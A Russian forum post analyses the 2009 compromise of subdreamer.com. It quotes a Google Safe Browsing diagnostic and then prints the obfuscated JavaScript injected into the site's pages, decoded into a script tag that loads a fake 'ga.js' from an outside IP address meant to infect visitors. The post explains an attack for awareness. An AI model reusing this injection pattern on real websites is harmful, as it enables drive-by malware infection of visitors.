- Автор темы
- #1
Безопасный просмотр
Страница диагностики для subdreamer.com
Занесен ли сайт subdreamer.com в список подозрительных веб-сайтов?
Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.
Что произошло во время последнего просмотра этого сайта компанией Google?
Из протестированных нами за последние 90 дней страниц данного сайта (18) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 1. Последний раз сайт просматривался Google 2009-03-26, а подозрительное содержание было обнаружено 2009-03-26.
Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая 84.244.138.0/.
This site was hosted on 2 network(s) including AS25847 (SERVINT), AS8075 (MICROSOFT).
Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
По всей видимости, за последние 90 дней сайт subdreamer.com не был промежуточным звеном в заражении других сайтов.
Размещается ли на этом сайте вредоносное программное обеспечение?
Нет. За последние 90 дней на этом сайте не размещалось вредоносное программное обеспечение.
Как это произошло?
В некоторых случаях третьи лица могут добавить вредоносный код на вполне законные сайты. Предупреждающее сообщение может быть показано нами именно по этой причине.
Следующие действия:
* Вернуться на предыдущую страницу.
Да, Subdreamer хакнули.
Посмотрел код, там в конце добавлено:
Этот код (выше) означает следующее:</body>
</html><html><script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result); </script></html>
<script type="text/javascript" src="http://84.244.138.55/google-analytics/ga.js"></script>
Но google-analytics не имеет ничего общего с Google Analytics. На самом деле открывает окно со стороннего сервера, который и пытается заразить компьютер посетителя Subdreamer.com. Поэтому Google его и запретил в Firefox. IE открывает без предупреждения.
Предположу (по собранной в Инете инфе), что ломанули всё же не сайт, а хостинг. Очевидно, у кого-то был украден доступ через FTP. Но, в любом случае, это неприятно